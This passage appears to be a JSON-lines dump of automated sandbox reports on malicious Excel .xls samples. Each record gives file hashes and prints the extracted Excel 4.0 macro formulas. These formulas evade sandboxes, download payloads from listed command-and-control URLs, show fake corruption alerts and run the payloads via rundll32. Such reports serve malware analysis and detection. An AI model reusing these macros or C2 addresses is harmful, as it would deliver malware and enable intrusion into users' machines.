HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kHf9CYQsfJ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ff0eb375531f3e9152730be3c0dd472496cc28435536d0108e7f073cb13831f"},"analysis":{"reported":"2020-04-09T16:15:56Z","score":10},"files":[{"filename":"3ff0eb375531f3e9152730be3c0dd472496cc28435536d0108e7f073cb13831f","filesize":167936,"md5":"86745f3b78cf253f8b217405b51155dd","sha1":"b1bf5fdf3df83342fd0dead20b55a641b3acd152","sha256":"3ff0eb375531f3e9152730be3c0dd472496cc28435536d0108e7f073cb13831f","sha512":"d966a339efde68dcbaa7d0d8ebf158f1b30cb7551d198bab040c2b6e59cb45942a12338642a4b5cb285b6494d2ec38d2a402deede9a544e004cd4028bb650004","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ff0eb375531f3e9152730be3c0dd472496cc28435536d0108e7f073cb13831f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"v2Y5WedHMs\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ff81466ece82caf8626289ef432c6d16ed3049af5287bc07ab69842fe393318"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"3ff81466ece82caf8626289ef432c6d16ed3049af5287bc07ab69842fe393318","filesize":167936,"md5":"30f34c417c8cac64b9e71dd1a658048a","sha1":"0ad2632b51466ef751046142f23741001da008d3","sha256":"3ff81466ece82caf8626289ef432c6d16ed3049af5287bc07ab69842fe393318","sha512":"d3b9601b747086f1fad9763195abe582dbfea3d23d709bc06f5a1433500bd31e7dd01442332cae3dcbc4e00e2e24550ff452f7be79969b9b64aba78b1196d4d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ff81466ece82caf8626289ef432c6d16ed3049af5287bc07ab69842fe393318.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oONZQCRjRH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"40077a4fbcc26b3a4f69b3e43c07fe2757342244b7476290228d688cd70f0e98"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"40077a4fbcc26b3a4f69b3e43c07fe2757342244b7476290228d688cd70f0e98","filesize":112640,"md5":"fdf335a5becfd5ae5ef73946217d3d3d","sha1":"d4fe3258e5d164b7c42f72c1e4da1b86732190c9","sha256":"40077a4fbcc26b3a4f69b3e43c07fe2757342244b7476290228d688cd70f0e98","sha512":"6b0f9f34258b36257cd0ad5ac4db55cdcfbae33fde2e8390aa88a475b2ce1b96bc1c48ba7d702b09d5a5715fb4b64fa385efe1b71b47715c52ee9c6e817729d3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"40077a4fbcc26b3a4f69b3e43c07fe2757342244b7476290228d688cd70f0e98.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4007cd94af07e14b2f8939354b49d88030cd38738b2105c37d7de9945143c08c"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"4007cd94af07e14b2f8939354b49d88030cd38738b2105c37d7de9945143c08c","filesize":185344,"md5":"acb477b6f65065af31b0e2c79688e39e","sha1":"2ac411b6c9f0902c221ea4d80510b4d523dec3dc","sha256":"4007cd94af07e14b2f8939354b49d88030cd38738b2105c37d7de9945143c08c","sha512":"8afc59771128d0ca61a2e02a5fe8e943cf54bb1866d13d7b22303eb283af5df800c43e7a01b9a241386b394ad58872974435df65f94628c779a52c2d0c0d1709","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4007cd94af07e14b2f8939354b49d88030cd38738b2105c37d7de9945143c08c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"400b55e22e772a5581abc56c28ed2a09d393e8b03f5255d47f2681c26a9ef267"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"400b55e22e772a5581abc56c28ed2a09d393e8b03f5255d47f2681c26a9ef267","filesize":170496,"md5":"5b6892a81cdadb83aebe35b969052628","sha1":"7d366552b9bd92b84f6d31e6dfdaa5b38cc139f0","sha256":"400b55e22e772a5581abc56c28ed2a09d393e8b03f5255d47f2681c26a9ef267","sha512":"03b32a64c86ef7c56f016a96a97b9d3784b1cc009c2278308b5295860954d8d12e2ae7c21b0e133946e03966f92c445fe6384c4cc19919c4932011c0e6007cca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"400b55e22e772a5581abc56c28ed2a09d393e8b03f5255d47f2681c26a9ef267.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mjkRYu9WXE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4016aa9f591802c231349ee73af6963a3570059e7061d13ff7e8f766c8a6611a"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"4016aa9f591802c231349ee73af6963a3570059e7061d13ff7e8f766c8a6611a","filesize":170496,"md5":"5208cc92af93b74e7a452b62b04fa514","sha1":"f0fa39c60c4eb53fc559f5ac18af3bbb18a96c9b","sha256":"4016aa9f591802c231349ee73af6963a3570059e7061d13ff7e8f766c8a6611a","sha512":"d3908feb0b5acea1c433ff078cc46ece1229e8f72304e7d12514584c2601f7348d72e4a10e7f1e9d806b0ee3bc0b3b287b255a8a1a28c38d352a01e61547b802","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4016aa9f591802c231349ee73af6963a3570059e7061d13ff7e8f766c8a6611a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dhegzVU5C2\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"401e3a3305dbe05d5b48de9bb4b0ba53b9dd01bc70417c626f3c2db05e144f52"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"401e3a3305dbe05d5b48de9bb4b0ba53b9dd01bc70417c626f3c2db05e144f52","filesize":168960,"md5":"750e235a2e050623353734daccbfbd0b","sha1":"70907b859bfa1c64e58dc7663eed896b1763968b","sha256":"401e3a3305dbe05d5b48de9bb4b0ba53b9dd01bc70417c626f3c2db05e144f52","sha512":"f155f4b9ecbcb97c561c432b43c306e2191f3a0dad398ccdec0399ca0d367061cc535b1dafa6a37931c889fab1967577f0aefe5d021ba9aff9db2a46f7770e58","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"401e3a3305dbe05d5b48de9bb4b0ba53b9dd01bc70417c626f3c2db05e144f52.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DXHJ9Lm64N\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4030837fc460420bd905f48c61dd1b6eb1014a277ae057d8b05eef948e77cd70"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"4030837fc460420bd905f48c61dd1b6eb1014a277ae057d8b05eef948e77cd70","filesize":209408,"md5":"8ce5f3e0a7e251845e37808146e384e2","sha1":"37f1ff1a1bd5437993c8300131805317fedbc7cb","sha256":"4030837fc460420bd905f48c61dd1b6eb1014a277ae057d8b05eef948e77cd70","sha512":"46649060ed52290205fe6fbc3e59c929bc253ca8989ea580e70b8d7bb89eae2323bdf5d7920b9c6b23e6fda7a50cd9f3a6c93c77f75897246d2e9be302440d97","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4030837fc460420bd905f48c61dd1b6eb1014a277ae057d8b05eef948e77cd70.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZhR4CoRT40\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"403a3fdd247f1ad81925f51b1aa5205811bab747d966eb2f64f4a19f8f94c032"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"403a3fdd247f1ad81925f51b1aa5205811bab747d966eb2f64f4a19f8f94c032","filesize":167936,"md5":"9f111e6d3cd59840413ca3b11f66d091","sha1":"179fd79f07bea37691fbe4ca625a45df7a1b98ac","sha256":"403a3fdd247f1ad81925f51b1aa5205811bab747d966eb2f64f4a19f8f94c032","sha512":"d33fa55688d927656653800b3e25ad14613328ee998f1bee275103914036b2bda49527d0be97563b81dd8108cafebfc3c81af525983bc2875c41bc57d24c19fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"403a3fdd247f1ad81925f51b1aa5205811bab747d966eb2f64f4a19f8f94c032.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cGqUkSwVWZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"403db35650b1d0ea3c32aebfdeeef3e42d19c8154dd030cce0b989da260a85f1"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"403db35650b1d0ea3c32aebfdeeef3e42d19c8154dd030cce0b989da260a85f1","filesize":116224,"md5":"b98defbc3e580a1d93fe066709c6f3ce","sha1":"b29edc6e9472dd1f3efa59eeb4ecc5d9a97e100a","sha256":"403db35650b1d0ea3c32aebfdeeef3e42d19c8154dd030cce0b989da260a85f1","sha512":"8c462a9077f8f1d5b5d09a119de6d44a5ca600362540ad307e124764234dcc36a9231998b1eea86b85321e08820506ad0cc4116f66ae14473567ae26580e73c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"403db35650b1d0ea3c32aebfdeeef3e42d19c8154dd030cce0b989da260a85f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MA6JEAWCZu\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"40421af679934e0a19617cb031568ebf3895580cd88180de898b4a35757d5745"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"40421af679934e0a19617cb031568ebf3895580cd88180de898b4a35757d5745","filesize":185344,"md5":"6d35156a67df089d384719de2bb0715d","sha1":"23a2cd04d927b7647f9602f4bfd1f56308470fb2","sha256":"40421af679934e0a19617cb031568ebf3895580cd88180de898b4a35757d5745","sha512":"1b7e5762248f98b68f96fddb0c69b59e2b31b118f1343e974b36af82ad4f1fcfcef81063a17462c2e8f7e7afc8ea334fbeab227444d2e225df1ff709b982765c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"40421af679934e0a19617cb031568ebf3895580cd88180de898b4a35757d5745.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4053d3b57eac60a9571693640232fee0541d372a3e969d7f3a12dcad217cc3b1"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"4053d3b57eac60a9571693640232fee0541d372a3e969d7f3a12dcad217cc3b1","filesize":167936,"md5":"107af3c3a0ca34114ec913e7e6b55fcf","sha1":"dd90961f48a82de55d2e7d7586e360a32ebb5421","sha256":"4053d3b57eac60a9571693640232fee0541d372a3e969d7f3a12dcad217cc3b1","sha512":"3e194b0853cb27de98bc1dfc4c4c86be78fee3cd739b7cfb41341c86441eb9185afdc22bd952f117d443f0a20984d677787a35f4a1b8679b90830402a8605316","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4053d3b57eac60a9571693640232fee0541d372a3e969d7f3a12dcad217cc3b1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7v6VGiGDlW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"405f9d722ae473003bf78dcff0250f1dc22609b9709236fc05a1d1f228b7295c"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"405f9d722ae473003bf78dcff0250f1dc22609b9709236fc05a1d1f228b7295c","filesize":209920,"md5":"9524b35a66a047479f96f447a6dfeda5","sha1":"a497ad1ab3bd5db59381cef08c7cfdacd5ae32ad","sha256":"405f9d722ae473003bf78dcff0250f1dc22609b9709236fc05a1d1f228b7295c","sha512":"2357957fc243283bee230cb5b70e73c3b7fd8defd3401b479b98644458fc07f4ef71df14404fa3f53f2a0369c75a64c78b151eddd0e321cb2794a182245af1e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"405f9d722ae473003bf78dcff0250f1dc22609b9709236fc05a1d1f228b7295c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vLoJkAslaU\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"408092d91abde3635adf61eab40650c5e584a08bf8cdd6e0821b4abf21304021"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"408092d91abde3635adf61eab40650c5e584a08bf8cdd6e0821b4abf21304021","filesize":113664,"md5":"586a50056a9df300b635c2df190502bc","sha1":"b6b73eb95da2847c451973ea816b7796e89c9b60","sha256":"408092d91abde3635adf61eab40650c5e584a08bf8cdd6e0821b4abf21304021","sha512":"89eba0e0f789acdab502396f104c23ed2d5858b4eee496be0243e399479dcecfdbbe46bf3a8552b5f08c0184c2ea392cfb674541d4f4fb03400dad183a44c796","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"408092d91abde3635adf61eab40650c5e584a08bf8cdd6e0821b4abf21304021.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Tg2dkzp5Lx\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4086b079bb7ab38554682ca4ba4d996a35ef1c26728dc59f84964f1dc0f7fb85"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"4086b079bb7ab38554682ca4ba4d996a35ef1c26728dc59f84964f1dc0f7fb85","filesize":185344,"md5":"d94115edf81e9577c78bc85d8819585a","sha1":"50d943d8f605a77f29ba71fb5c7362377ded61f7","sha256":"4086b079bb7ab38554682ca4ba4d996a35ef1c26728dc59f84964f1dc0f7fb85","sha512":"d6d4807f5489efe78c90ea193da574ca4f4c6beb21a8239f4f066f9d9201a7817ba33c264912ba20fa2f7d71f7360cea06ffe9407612185449b2d79baef0fd5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4086b079bb7ab38554682ca4ba4d996a35ef1c26728dc59f84964f1dc0f7fb85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"40a46894e7e2e5293a1aa56bbc62e68f1efbc5704d210b10c1a13e75d59780a1"},"analysis":{"reported":"2020-04-09T16:15:57Z","score":10},"files":[{"filename":"40a46894e7e2e5293a1aa56bbc62e68f1efbc5704d210b10c1a13e75d59780a1","filesize":152576,"md5":"3d33435c1992ce84df3101c4f4ef8f2f","sha1":"3543251543ac899a5f6aab916d05dbd5e62fd758","sha256":"40a46894e7e2e5293a1aa56bbc62e68f1efbc5704d210b10c1a13e75d59780a1","sha512":"284e3cf4d97dfba764f13c3ebe4c8bcb523e22f2ac06e70b41a6c3575510352b6a5b437216d0b974fc05c080ce4c3863b8d55ce5b843b8b5fe0f094034157af8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"40a46894e7e2e5293a1aa56bbc62e68f1efbc5704d210b10c1a13e75d59780a1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"E3v8YsoY22\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"40c0e7266a6df767dbd0c3e7f3071a4cda591f866474af726acb1fd6b1ca0513"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"40c0e7266a6df767dbd0c3e7f3071a4cda591f866474af726acb1fd6b1ca0513","filesize":228864,"md5":"cac2ebb33ec2cff9915f4a31fa9029b0","sha1":"bbd9e99b74f359f5b99e1c051ca420a5c93360d3","sha256":"40c0e7266a6df767dbd0c3e7f3071a4cda591f866474af726acb1fd6b1ca0513","sha512":"a52764c1e5c194b6a2f2d2925808c22755557c2af6f1300f8c97a56c83dbc08fb9f35a5f7e0f35c3d4c89fec78324e628099da91873b3a7ac1898805ee73ac70","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"40c0e7266a6df767dbd0c3e7f3071a4cda591f866474af726acb1fd6b1ca0513.xls"}],"unpack_count":0,"error_count":0